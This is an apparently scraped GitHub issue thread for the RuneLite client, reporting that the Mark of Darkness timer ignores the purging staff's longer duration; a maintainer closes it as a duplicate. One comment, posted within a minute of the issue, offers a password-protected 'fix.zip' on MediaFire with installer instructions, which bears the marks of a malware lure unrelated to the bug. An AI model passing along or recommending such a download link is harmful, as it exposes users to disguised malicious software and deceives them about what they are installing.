### ISSUE TITLE
Mark of darkness timer seems to be wrong when casting it while equipping a purging staff.

### ISSUE THREAD

**Issue by YavuzDev** [runelite/runelite#18200] opened 2024-08-29 03:06 UTC
### Type

Incorrect behavior

### Operating System

Windows

### OS Version

2

### Bug description

Mark of darkness duration depends on your magic level but when used with a purging staff it goes to 5 minutes if I read correctly on the wiki, Currently it just calculates it based on your magic level.

In the screenshot you can see the timer for mark of darkness while wearing the purging staff (my magic level is 92)

In the second image you can see it says that mark of darkness has already been cast but the timer is gone.

### Screenshots or videos

![image](https://github.com/user-attachments/assets/49aa8a40-b335-4523-8e5d-1426b4917021)

https://i.imgur.com/1tbmqLS.jpeg

### RuneLite version

1.10.36.1

**Comment by africanobyamugisha** [comment] 2024-08-29 03:06
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Felanbird** [comment] 2024-08-29 03:08
Duplicate of #18128

**Closed by Felanbird** 2024-08-29 03:08 UTC
Labels: needs-triage
